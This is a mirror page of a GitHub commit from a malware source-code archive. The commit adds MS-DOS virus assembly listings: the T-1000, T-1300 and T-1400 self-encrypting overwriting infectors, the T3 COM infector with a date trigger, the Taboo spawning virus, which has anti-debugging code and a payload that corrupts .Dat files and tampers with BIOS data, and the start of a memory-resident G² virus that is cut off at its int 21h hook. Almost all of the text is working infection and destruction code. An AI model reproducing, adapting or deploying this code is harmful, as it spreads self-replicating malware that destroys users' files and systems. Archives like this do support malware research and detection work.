Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-27 09:28:25 +00:00
Code Releases Activity

Add files via upload

Browse Source
This commit is contained in:
vxunderground 2021-01-12 18:01:59 -06:00 committed by GitHub
parent 5dd4938a52
commit 3e7d2e8262
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
99 changed files with 45150 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

95
MSDOS/Virus.MSDOS.Unknown.t-1000.asm Normal file
View File

@ -0,0 +1,95 @@
;
; T-1000 Virus
;
; This virus is a Non-Resident Overwriting Self-Encrypting .COM File Inctector.
; When an infected program is started, the virus will infect all files in the
; current directory and use the time counter for its encryption. It displays
; the text "T-1000" when it is ready infecting.
Code Segment para 'code'
Assume Cs:Code,Ds:Code
Length Equ Offset EndByte-Offset Main
Org 100h
Main: Mov Si,Offset Decrypt
Mov Di,Si
Mov Cl,Offset EndByte-Offset Decrypt
On2: Lodsb
Db 34h
Crypt Db 0
Stosb
Dec Cl
Cmp Cl,0ffh
Jne On2
Decrypt:
Mov Ah,4eh
Push Ax
Encr:
Mov Ah,2ch
Int 21h
Mov Crypt,Dl
Mov Si,Offset Decrypt
Mov Di,Offset EndByte+10
Mov Cx,Offset EndByte-Offset Decrypt
On3: Lodsb
Xor Al,Crypt
Stosb
Dec Cx
Cmp Cx,0ffffh
Jne On3
Pop Ax
On1: Xor Cx,Cx
Mov Dx,Offset Nam
Int 21h
Jc Einde
Mov Ax,3d01h
Mov Dx,9eh
Int 21h
Mov Bx,Ax
Mov Ah,40h
Push Ax
Mov Cx,Offset Decrypt-Offset Main
Mov Dx,Offset Main
Int 21h
Pop Ax
Mov Cx,Offset EndByte-Offset Decrypt
Mov Dx,Offset EndByte+10
Int 21h
Mov Ah,3eh
Int 21h
Mov Ah,4fh
Push Ax
Jmp Short Encr
Einde:
Mov Ah,9
Mov Dx,Offset Msg
Push Cs
Pop Ds
Int 21h
Int 20h
Msg Db 'T-1000$'
Nam Db '*.Com',0
EndByte Db 0
Code Ends
End Main
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

79
MSDOS/Virus.MSDOS.Unknown.t-1300.asm Normal file
View File

@ -0,0 +1,79 @@
;
; T-1300 Virus
;
; This is a non-resident overwriting self-encrypting semi-mutating .exe file
; infector. When an infected program is run, the virus will infect all the
; file in the current directory and displays "T-1300" when finished with
; infecting. This is a bit more advanced virus than "T-1000" and a wildcard
; scanstring is needed to find this virus.
;
S_1: Lea Si,Main
Mov Cx,MainLen
Length Equ $-2
Decrypt: Xor B [Si],0
CryptByte Equ $-1
S_2 Equ $-2
S_3: Inc Si
S_4: Loop Decrypt
CryptLen Equ $-S_1
Main: Mov Ah,4eh
SeekNext: Lea Dx,FileSpec
Xor Cx,Cx
Int 21h
Jc Einde
Mov Ax,3d02h
Mov Dx,09eh
Int 21h
Xchg Ax,Bx
Mov Ds,Cx
Inc Cx
Mov Ah,B Ds:[46ch]
Mov Ds,Cs
Mov B CryptByte,Ah
Test Ah,1
Jne NoReg
Xor B S_1,Cl
Xor B S_2,Cl
Xor B S_3,Cl
NoReg: Test Ah,2
Jne NoXor
Xor B Decrypt,2
NoXor: Test Ah,4
Jne NoLoop
Xor B S_4,2
NoLoop: Lea Si,Main
Lea Di,CryptPart
Mov Cx,MainLen
Push Cx
CodeIt: Lodsb
Xor Al,Ah
Stosb
Loop CodeIt
Pop Cx
And Ax,03fffh
Add Cx,Ax
Mov W Length,Cx
Mov Ah,40h
Lea Dx,S_1
Mov Cx,CryptLen
Int 21h
Mov Ah,40h
Lea Dx,CryptPart
Mov Cx,MainLen
Int 21h
Mov Ah,3eh
Int 21h
Mov Ah,4fh
Jmp SeekNext
Einde: Mov Ah,9
Lea Dx,Msg
Int 21h
Ret
FileSpec Db '*.EXE',0
Msg Db 'T-1300$'
MainLen Equ $-Main
CryptPart Equ $

143
MSDOS/Virus.MSDOS.Unknown.t-1400.asm Normal file
View File

@ -0,0 +1,143 @@
;
; T-1400 Virus
;
; This is a non-resident overwriting self-encrypting semi-mutating .COM file
; infector. When an infected program is run, the virus will infect all the
; file in the current directory and displays a TridenT logo when finished with
; infecting. This is a bit more advanced virus than "T-1300" and a wildcard
; scanstring is needed to find this virus. It now utilizes three types of
; encryption, instead of only the XOR loop. it now utilizes ADD, ADC, SUB and
; SBB. the increment SI has now a new
; possibility, CMPSB.
;
Beg:
Mov Cx,MainLen
Length Equ $-2
S_1: Lea Si,Main
Zaken: Clc
Decrypt: Xor B [Si],0
CryptByte Equ $-1
S_2 Equ $-2
S_3: Inc Si
S_4: Loop Zaken
CryptLen Equ $-Beg
Main: Mov Ah,4eh
SeekNext: Lea Dx,FileSpec
Xor Cx,Cx
Int 21h
Jnc Yup
Jmp Einde
Yup: Mov Ax,3d02h
Mov Dx,09eh
Int 21h
Xchg Ax,Bx
Mov Ds,Cx
Inc Cx
Mov Ax,W Ds:[46ch]
Mov Ds,Cs
Mov B CryptByte,Ah
Mov B Zaken,0f8h
Mov B What,1
Mov B S_2,34h
Test Al,1
Jne NotXor
Test Al,32
Jne Done
Xor B Zaken,1
Jmp Done
NotXor: Mov B What,2
Mov B S_2,04h
Test Al,2
Je Done
Test Al,4
Je ItsAdc
Mov B What,3
Mov B S_2,2ch
Test Al,8
Je Done
Sub B S_2,20h
ItsAdc: Add B S_2,10h
Done: Mov B S_1,0beh
Cmp Ah,80h
Ja NoCMPSB
Mov B S_3,0A6h
Jmp Next
NoCMPSB: Mov B S_3,46h
Next: Test Ah,1
Jne NoReg
Xor B S_1,Cl
Xor B S_2,Cl
Cmp Ah,80h
Jbe NoReg
Xor B S_3,Cl
NoReg: Test Ah,2
Jne NoXor
Xor B Decrypt,2
NoXor: Test Ah,4
Jne NoLoop
Xor B S_4,2
NoLoop: Test Ah,8
Jne Ok
Mov B S_4,0E2h
Ok: Lea Si,Main
Lea Di,CryptPart
Mov Cx,MainLen
Push Cx
CodeIt: Lodsb
Cmp B What,1
Jne NeXor
Xor Al,Ah
Jmp Stor
NeXor: Cmp B What,2
Jne NeSub
Sub Al,Ah
Jmp Stor
NeSub: Add Al,Ah
Stor: Stosb
Loop CodeIt
Pop Cx
And Ax,03fffh
Add Cx,Ax
Mov W Length,Cx
Mov Ah,40h
Lea Dx,Beg
Mov Cx,CryptLen
Int 21h
Mov Ah,40h
Lea Dx,CryptPart
Mov Cx,MainLen
Int 21h
Mov Ah,3eh
Int 21h
Mov Ah,4fh
Jmp SeekNext
What Db 0
Einde:
Mov Al,3
Int 10h
Lea Si,Y
R: Lodsb
Mov Cl,8
C: Rol Al,1
Push Ax
Mov Al,32
If C Mov Al,219
Int 29h
Int 29h
Pop Ax
Loop C
Cmp Si,E
Jne R
Ret
Y: db 125,231,121,244,95,17,18,69,6,68,17,226,69,197,68,17,18,69,4,196,17,23,121,244,68
E:
FileSpec Db '*.COM',0
Msg Db 'T-1400'
MainLen Equ $-Main
CryptPart Equ $

361
MSDOS/Virus.MSDOS.Unknown.t3.asm Normal file
View File

@ -0,0 +1,361 @@
;LiquidCode --- T3
;
; Virus
;This version:
;Searches current directory for non-infected com files, if any found
;it will become infected!
;This virus has a routine which self-destructs itself and uninfects
;the file.
assume cs:code
.286
code segment "code"
org 0100h
start proc
jmp v_start ;first 5 bytes |
nop ; |
nop ; |
v_start:
call $+3 ;Actual virus
pop dx
sub dx, 3
push dx ;save relocation factor in BP
pop bp ;so virus can be copied anywhere twoards
mov si, dx ;the end of the file
;
; Replace first 5 bytes in memory with original
; program code so normal program can run later
add si, first_five
mov di, 0100h
mov cx, 5
lodsb
stosb
loop $-2
;see if user want to disinfect this file
; mov si, 82h
; lodsb
; cmp al, "[" ;is al the code to disinfect? "["
; jne ok_dont_disinfect
; jmp self_kill
ok_dont_disinfect:
;here should be date checks to see
;if an evil function should be unleashed!!
mov ah, 2ah
int 21h
;cx year 1980-2099
;dh month 1-12
;dl day
;al day of week 0=sun 1=mon -> 7=sat
cmp dh, 12
jne notdec
cmp dl, 25
jne notdec
jmp christmas
notdec:
cmp dh, 4
jne notapril
cmp dl, 1
jne notapril
; jmp aprilfools
notapril:
;Set the DTA
call set_dta
;find first file to ?infect?
call find_first_file
go_again:
mov si, bp
add si, size_
lodsw
cmp ax, 5
ja gd4
jmp resrch
gd4:
call open_file
mov bx, ax
mov al, 0
call date_time
mov ah, 3fh
mov cx, 5
mov dx, bp
add dx, first_five
int 21h
;**** mov ax, 4202h
mov cx, 0
mov ax, 4202h
mov dx, cx
int 21h
sub ax, 3
mov si, bp
add si, new_5
mov [si+1], ax
mov si, bp
mov di, si
add si, chkmark
add di, mark
mov cx, 2
repe cmpsb
jne INFECT
;File found was previously infected!
; search for new one now.
jmp resrch
wipe_name:
push di
push ax
push cx
mov di, bp
add di, name_
mov cx, 13
mov al, 0
rep stosb
pop cx
pop ax
pop di
ret
resrch:
call wipe_name
mov ah, 4fh
int 21h
jnc gd3
jmp term_virus
gd3:
jmp go_again
INFECT:
;Time to infect the file!!
mov si, bp
add si, handle
mov bx, [si]
mov cx, vsize
mov dx, bp
call wipe_name
mov ax, 4000h
int 21h
mov ax, 4200h
mov cx, 0
mov dx, cx
int 21h
mov dx, bp
add dx, new_5
mov ax, 4000h
mov cx, 5
int 21h
mov al, 1
call date_time
mov ax, 3e00h
int 21h
jmp resrch
fndnam proc
mov si, env
mov ax, [si]
mov es, ax
mov ds, ax
mov si, 0
mov di, si
__lp:
lodsb
cmp al, 0
je chknxt
stosb
jmp __lp
chknxt:
stosb
lodsb
cmp al, 0
je fnd1
stosb
jmp __lp
fnd1:
stosb
__lp2:
lodsb
cmp al, "a"
jae ff_
up2:
cmp al, "A"
jae fff_
up3:
stosb
jmp __lp2
ff_:
cmp al,"z"
jbe fnd
jmp up2
fff_:
cmp al, "Z"
jbe fnd
jmp up3
fnd:
mov si, di
mov al, 0
repne scasb
mov dx, si
mov di, dx
ret
env equ 2ch
fndnam endp
self_kill:
;this procedure disinfects specified files
;SI points to the name of current file on disk
;which is infected
call fndnam ;find name of current file from env block in memory
jmp gd__
abrt:
int 20h
gd__:
mov ax, 3d02h
int 21h
jc abrt
mov bx, ax
mov ax, cs
mov ds, ax
mov es, ax
mov cx, 5
mov dx, bp
add dx, first_five
call wipe_name
mov ax, 4000h
int 21h
jc abrt
mov dx, 0
mov cx, 0
mov ax, 4202h
int 21h
jnc gd__1
jmp abrt
gd__1:
sub ax, vsize
mov dx, ax
mov cx, 0
mov ax, 4200h
int 21h
call wipe_name
mov cx, 0
mov ax, 4000h
int 21h
mov ax, 3e00h
int 21h
jmp term_virus
date_time:
pusha
mov ah, 57h
cmp al, 0
je fnd__$
mov di, bp
mov si, di
add di, date
add si, time
mov dx, [di]
mov cx, [si]
int 21h
jmp ret__
fnd__$:
int 21h
mov si, bp
mov di, bp
add si, time
add di, date
mov [si], cx
mov [di], dx
ret__:
popa
ret
open_file:
mov dx, bp
add dx, name_
mov ax, 3d02h
int 21h
jnc gd2
jmp term_virus
gd2:
mov si, bp
add si, handle
mov [si], ax
ret
find_first_file:
mov dx, bp
mov cx, 0
mov ah, 4eh
add dx, all_com_files
int 21h
jnc gd1
jmp term_virus
gd1:
ret
set_dta:
mov dx, bp
mov ah, 1ah
add dx, dta
int 21h
ret
term_virus:
mov ax, 0
mov bx, ax
mov cx, bx
mov dx, cx
mov si, 0100h
mov di, -1
mov bp, di
push 0100h
ret
CHRISTMAS:
;Program Lockup
; Exit without running program
int 20h
;APRILFOOLS:
;Ha Ha delete current file
; call fndnam
; mov ah, 41h
; int 21h
; mov ax, cs
; mov ds, ax
; mov es, ax
; jmp term_virus
; Data Bank
_fstfive:
int 20h
nop
ckmrk:
nop
nop
acf db "*.COM",0
dt_ dw 0
tme dw 0
d_t_a:
rfd db 21 dup (0)
att db 0
dw 0
dw 0
sz dd 0
n_me db 13 dup (0),0
handl dw 0
nw_5 db 0e9h,0,0
mrk db "<T3> "
strain db "<tm>LiquidCode 92"
;
end___:
first_five = offset _fstfive-0105h
all_com_files = offset acf-0105h
dta = offset d_t_a-0105h
attribute = offset att-0105h
time = offset tme-0105h
date = offset dt_-0105h
size_ = offset sz-0105h
name_ = offset n_me-0105h
handle = offset handl-0105h
new_5 = offset nw_5-0105h
mark = offset mrk-0105h
chkmark = offset ckmrk-0105h
vsize = offset end___-0105h
start endp
code ends
end start

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

539
MSDOS/Virus.MSDOS.Unknown.taboo.asm Normal file
View File

@ -0,0 +1,539 @@
; TABOO.ASM -- Taboo Virus
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Virucidal Maniac
virus_type equ 2 ; Spawning Virus
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
start label near
main proc near
call encrypt_decrypt ; Decrypt the virus
start_of_code label near
stop_tracing: mov cx,09EBh
mov ax,0FE05h ; Acutal move, plus a HaLT
jmp $-2
add ah,03Bh ; AH now equals 025h
jmp $-10 ; Execute the HaLT
mov bx,offset null_vector ; BX points to new routine
push cs ; Transfer CS into ES
pop es ; using a PUSH/POP
int 021h
mov al,1 ; Disable interrupt 1, too
int 021h
jmp short skip_null ; Hop over the loop
null_vector: jmp $ ; An infinite loop
skip_null: mov byte ptr [lock_keys + 1],130 ; Prefetch unchanged
lock_keys: mov al,128 ; Change here screws DEBUG
out 021h,al ; If tracing then lock keyboard
mov ah,04Ah ; DOS resize memory function
mov bx,(finish - start) / 16 + 0272h ; BX holds # of para.
int 021h
mov sp,(finish - start) + 01100h ; Change top of stack
mov si,offset spawn_name ; SI points to true filename
int 02Eh ; DOS execution back-door
push ax ; Save return value for later
mov ax,cs ; AX holds code segment
mov ds,ax ; Restore data segment
mov es,ax ; Restore extra segment
mov cx,0003h ; Do 3 infections
search_loop: push cx ; Save CX
call search_files ; Find and infect a file
pop cx ; Restore CX
loop search_loop ; Repeat until CX is 0
xor ah,ah ; BIOS get time function
int 01Ah
test dx,0001h ; Is timer divisible by 2?
jne no_infection ; If not then don't spread
call search_files ; Find and infect a file
no_infection:
call get_day
cmp ax,000Fh ; Did the function return 15?
je strt00 ; If equal, do effect
call get_cpu
cmp ax,01E6h ; Did the function return 486?
je strt00 ; If equal, do effect
jmp end00 ; Otherwise skip over it
strt00: xor ah,ah ; BIOS get time function
int 1Ah
xchg dx,ax ; AX holds low word of timer
mov dx,0FFh ; Start with port 255
out_loop: out dx,al ; OUT a value to the port
dec dx ; Do the next port
jne out_loop ; Repeat until DX = 0
end00: call get_minute
cmp ax,001Eh ; Did the function return 30?
jg strt01 ; If greater, do effect
jmp end01 ; Otherwise skip over it
strt01: mov cx,000Ah ; First argument is 10
new_shot: push cx ; Save the current count
mov dx,0140h ; DX holds pitch
mov bx,0100h ; BX holds shot duration
in al,061h ; Read the speaker port
and al,11111100b ; Turn off the speaker bit
fire_shot: xor al,2 ; Toggle the speaker bit
out 061h,al ; Write AL to speaker port
add dx,09248h ;
mov cl,3 ;
ror dx,cl ; Figure out the delay time
mov cx,dx ;
and cx,01FFh ;
or cx,10 ;
shoot_pause: loop shoot_pause ; Delay a bit
dec bx ; Are we done with the shot?
jnz fire_shot ; If not, pulse the speaker
and al,11111100b ; Turn off the speaker bit
out 061h,al ; Write AL to speaker port
mov bx,0002h ; BX holds delay time (ticks)
xor ah,ah ; Get time function
int 1Ah ; BIOS timer interrupt
add bx,dx ; Add current time to delay
shoot_delay: int 1Ah ; Get the time again
cmp dx,bx ; Are we done yet?
jne shoot_delay ; If not, keep checking
pop cx ; Restore the count
loop new_shot ; Do another shot
end01: call get_rollover
cmp ax,0001h ; Did the function return 1?
je strt02 ; If equal, do effect
jmp end02 ; Otherwise skip over it
strt02: mov dx,00C8h ; First argument is 200
push es ; Save ES
mov ax,040h ; Set extra segment to 040h
mov es,ax ; (ROM BIOS)
mov word ptr es:[013h],dx ; Store new RAM ammount
pop es ; Restore ES
end02: call get_day
cmp ax,0007h ; Did the function return 7?
jg strt03 ; If greater, do effect
jmp end03 ; Otherwise skip over it
strt03: xor bx,bx ; Clear BX
mov si,0001h ; Second argument is 1
push es ; Save ES
xor ax,ax ; Set the extra segment to
mov es,ax ; zero (ROM BIOS)
shl bx,1 ; Convert to word index
shl si,1 ; Convert to word index
mov ax,word ptr [bx + 03FEh]; Zero COM port address
xchg word ptr [si + 03FEh],ax; Put first value in second,
mov word ptr [bx + 03FEh],ax; and second value in first!
pop es ; Restore ES
end03: call get_dos_version
or ax,ax ; Did the function return zero?
jg strt04 ; If greater, do effect
jmp end04 ; Otherwise skip over it
strt04: mov dx,offset data00 ; DX points to data
push bp ; Save BP
mov bp,sp ; BP points to stack frame
sub sp,4096 ; Allocate 4096-byte buffer
push di ; Save DI
mov ah,02Fh ; DOS get DTA function
int 021h
mov di,bx ; DI points to DTA
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds all file attributes
int 021h
jc corrupt_end ; If no files found then exit
corrupt_file: mov ax,04301h ; DOS set file attributes function
xor cx,cx ; File will have no attributes
lea dx,[di + 01Eh] ; DX points to file name
int 021h
mov ax,03D02h ; DOS open file function, r/w
lea dx,[di + 01Eh] ; DX points to file name
int 021h
xchg bx,ax ; Transfer file handle to AX
c_crypt_loop: mov ah,03Fh ; DOS read from file function
mov cx,4096 ; Read 4k of characters
lea dx,[bp - 4096] ; DX points to the buffer
int 021h
or ax,ax ; Were 0 bytes read?
je close_c_file ; If so then close it up
push ax ; Save AX
lea si,[bp - 4096] ; SI points to the buffer
xor ah,ah ; BIOS get clock ticks function
int 01Ah
pop cx ; CX holds number of bytes read
push cx ; Save CX
corrupt_bytes: xor byte ptr [si],dl ; XOR byte by clock ticks
inc si ; Do the next byte
inc dx ; Change the key for next byte
loop corrupt_bytes ; Repeat until buffer is done
pop dx ; Restore DX (holds bytes read)
push dx ; Save count for write
mov ax,04201h ; DOS file seek function, current
mov cx,0FFFFh ; Seeking backwards
neg dx ; Seeking backwards
int 021h
mov ah,040h ; DOS write to file function
pop cx ; CX holds number of bytes read
lea dx,[bp - 4096] ; DX points to the buffer
int 021h
jmp short c_crypt_loop
close_c_file: mov ax,05701h ; DOS set file date/time function
mov cx,[di + 016h] ; CX holds old file time
mov dx,[di + 018h] ; DX holds old file data
int 021h
mov ah,03Eh ; DOS close file function
int 021h
mov ax,04301h ; DOS set file attributes function
xor ch,ch ; Clear CH for attributes
mov cl,[di + 015h] ; CL holds old attributes
lea dx,[di + 01Eh] ; DX points to file name
int 021h
mov ah,04Fh ; DOS find next file function
int 021h
jnc corrupt_file ; If successful do next file
corrupt_end: pop di ; Restore DI
mov sp,bp ; Deallocate local buffer
pop bp ; Restore BP
end04: pop ax ; AL holds return value
mov ah,04Ch ; DOS terminate function
int 021h
main endp
db 0C3h,0FDh,0C2h,0F3h,0C7h
search_files proc near
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,64 ; Allocate 64 bytes on stack
mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 64] ; SI points to 64-byte buffer
int 021h
mov ah,03Bh ; DOS change directory function
mov dx,offset root ; DX points to root directory
int 021h
call traverse ; Start the traversal
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 64] ; DX points to old directory
int 021h
mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller
root db "\",0 ; Root directory
search_files endp
traverse proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first function
mov cx,00010000b ; CX holds search attributes
mov dx,offset all_files ; DX points to "*.*"
int 021h
jc leave_traverse ; Leave if no files present
check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory?
jne another_dir ; If not, try again
cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."?
je another_dir ;If so, keep going
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 98] ; DX points to new directory
int 021h
call traverse ; Recursively call ourself
pushf ; Save the flags
mov ah,03Bh ; DOS change directory function
mov dx,offset up_dir ; DX points to parent directory
int 021h
popf ; Restore the flags
jnc done_searching ; If we infected then exit
another_dir: mov ah,04Fh ; DOS find next function
int 021h
jnc check_dir ; If found check the file
leave_traverse:
mov dx,offset exe_mask ; DX points to "*.EXE"
call find_files ; Try to infect a file
done_searching: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
up_dir db "..",0 ; Parent directory name
all_files db "*.*",0 ; Directories to search for
exe_mask db "*.EXE",0 ; Mask for all .EXE files
traverse endp
db 075h,03Dh,0BDh,095h,0EAh
find_files proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
push dx ; Save file mask
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds all file attributes
pop dx ; Restore file mask
find_a_file: int 021h
jc done_finding ; Exit if no files found
call infect_file ; Infect the file!
jnc done_finding ; Exit if no error
mov ah,04Fh ; DOS find next file function
jmp short find_a_file ; Try finding another file
done_finding: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
find_files endp
db 0E7h,096h,07Dh,03Ch,0BEh
infect_file proc near
mov ah,02Fh ; DOS get DTA address function
int 021h
mov di,bx ; DI points to the DTA
lea si,[di + 01Eh] ; SI points to file name
mov dx,si ; DX points to file name, too
mov di,offset spawn_name + 1; DI points to new name
xor ah,ah ; AH holds character count
transfer_loop: lodsb ; Load a character
or al,al ; Is it a NULL?
je transfer_end ; If so then leave the loop
inc ah ; Add one to the character count
stosb ; Save the byte in the buffer
jmp short transfer_loop ; Repeat the loop
transfer_end: mov byte ptr [spawn_name],ah; First byte holds char. count
mov byte ptr [di],13 ; Make CR the final character
mov di,dx ; DI points to file name
xor ch,ch ;
mov cl,ah ; CX holds length of filename
mov al,'.' ; AL holds char. to search for
repne scasb ; Search for a dot in the name
mov word ptr [di],'OC' ; Store "CO" as first two bytes
mov byte ptr [di + 2],'M' ; Store "M" to make "COM"
mov byte ptr [set_carry],0 ; Assume we'll fail
mov ax,03D00h ; DOS open file function, r/o
int 021h
jnc infection_done ; File already exists, so leave
mov byte ptr [set_carry],1 ; Success -- the file is OK
mov ah,03Ch ; DOS create file function
mov cx,00100111b ; CX holds file attributes (all)
int 021h
xchg bx,ax ; BX holds file handle
call encrypt_code ; Write an encrypted copy
mov ah,03Eh ; DOS close file function
int 021h
infection_done: cmp byte ptr [set_carry],1 ; Set carry flag if failed
ret ; Return to caller
spawn_name db 12,12 dup (?),13 ; Name for next spawn
set_carry db ? ; Set-carry-on-exit flag
infect_file endp
db 08Dh,0EDh,035h,0A0h,000h
get_cpu proc near
mov dx,86 ; Assume it's an 8088/8086
push sp
pop ax
cmp sp,ax
jne get_cpu_end ; If the test failed then exit
mov dx,286 ; Assume it's an 80286
pushf
pop ax
or ax,04000h
popf
pushf
pop ax
test ax,04000h
jne get_cpu_end ; If the test failed then exit
mov dx,386 ; Assume it's an 80386
.386c ; We have to use 386 instructions
mov ebx,esp
and esp,0FFFCh
pushfd
pop eax
mov ecx,eax
xor ax,0004h
push eax
popfd
pushfd
pop eax
and eax,0004h
and ecx,0004h
cmp eax,ecx
je is_386 ; If the test failed it's a 386
mov dx,486 ; It must be a 80486 then
is_386: push ecx
popfd
mov esp,ebx
get_cpu_end: xchg dx,ax ; Transfer chip type to AX
ret ; Return to caller
get_cpu endp
db 0F6h,016h,05Ch,072h,084h
get_day proc near
mov ah,02Ah ; DOS get date function
int 021h
mov al,dl ; Copy day into AL
cbw ; Sign-extend AL into AX
ret ; Return to caller
get_day endp
db 0C6h,02Eh,047h,0ACh,053h
get_dos_version proc near
mov ah,030h ; DOS get DOS version function
int 021h
mov bx,ax ; Save return value in BX
xor bl,bl ; Clear DOS major version in BX
xchg bh,bl ; Place 0 in BH, minor in BL
cbw ; Sign-extend AL into AX
mov cl,100 ; CL holds multiplier
mul cl ; Multiply AL by 100
add ax,bx ; Add back the minor version
ret ; Return to caller
get_dos_version endp
db 03Ah,06Fh,04Ah,03Dh,091h
get_minute proc near
mov ah,02Ch ; DOS get time function
int 021h
mov al,cl ; Copy minute into AL
cbw ; Sign-extend AL into AX
ret ; Return to caller
get_minute endp
db 02Ah,0D1h,031h,0C6h,081h
get_rollover proc near
push es ; Save ES
mov ax,040h ; Set the extra segment to
mov es,ax ; 040h (ROM BIOS)
mov al,byte ptr [0070h] ; AL holds rollover flag
cbw ; Sign-extend AL into AX
pop es ; Restore ES
ret ; Return to caller
get_rollover endp
data00 db "*.Dat"
vcl_marker db "[VCL]",0 ; VCL creation marker
note db "Taboo Virus"
db "Version 2.12"
db "By Virucidal Maniac"
encrypt_code proc near
mov si,offset encrypt_decrypt; SI points to cipher routine
xor ah,ah ; BIOS get time function
int 01Ah
mov word ptr [si + 8],dx ; Low word of timer is new key
xor byte ptr [si],1 ;
xor byte ptr [si + 7],1 ; Change all SIs to DIs
xor word ptr [si + 10],0101h; (and vice-versa)
mov di,offset finish ; Copy routine into heap
mov cx,finish - encrypt_decrypt - 1 ; All but final RET
push si ; Save SI for later
push cx ; Save CX for later
rep movsb ; Copy the bytes
mov si,offset write_stuff ; SI points to write stuff
mov cx,5 ; CX holds length of write
rep movsb ; Copy the bytes
pop cx ; Restore CX
pop si ; Restore SI
inc cx ; Copy the RET also this time
rep movsb ; Copy the routine again
mov ah,040h ; DOS write to file function
mov dx,offset start ; DX points to virus
call finish ; Encrypt/write/decrypt
ret ; Return to caller
write_stuff: mov cx,finish - start ; Length of code
int 021h
encrypt_code endp
end_of_code label near
encrypt_decrypt proc near
mov si,offset start_of_code ; SI points to code to decrypt
mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
xor_loop: db 081h,034h,00h,00h ; XOR a word by the key
inc si ; Do the next word
inc si ;
loop xor_loop ; Loop until we're through
ret ; Return to caller
encrypt_decrypt endp
finish label near
code ends
end main

313
MSDOS/Virus.MSDOS.Unknown.target.asm Normal file
View File

@ -0,0 +1,313 @@
; Virus generated by Gý 0.70á
; Gý written by Dark Angel of Phalcon/Skism
; File: TARGET.ASM
; [Gý Virus] by Phalcon/Skism
checkres1 = 'FF'
checkres2 = 'FF'
id = 'FF'
.model tiny
.code
; Assemble with:
; TASM /m3 filename.ASM
; TLINK filename.OBJ
; EXE2BIN filename.EXE filename.COM
org 0000h
start:
call next
next:
pop bp
sub bp, offset next
push es
push ds
mov ax, checkres1 ; Installation check
int 0021h
cmp ax, checkres2 ; Already installed?
jz done_install
mov ah, 004Ah ; alter memory allocation
mov bx, 0FFFFh ; of segment at ES
int 0021h
sub bx, (endheap-start+15)/16+1
mov ah, 004Ah ; alter memory allocation
int 0021h
jc done_install
sub word ptr ds:[0002h], (endheap-start+15)/16+1
mov ah, 0048h ; Allocate memory for the virus
mov bx, (endheap-start+15)/16
int 0021h
jc done_install
mov es, ax
dec ax
mov ds, ax ; Get MCB
mov byte ptr ds:[0000h], 'Z' ; Mark end of chain
mov word ptr ds:[0001h], 0008h ; Mark owner = DOS
push cs
pop ds
xor di, di
mov cx, (heap-start)/2+1 ; Bytes to move
mov si, bp ; lea si,[bp+offset start]
rep movsw
xor ax, ax
mov ds, ax
push ds
lds ax, ds:[21h*4] ; Get old int handler
mov word ptr es:oldint21, ax
mov word ptr es:oldint21+2, ds
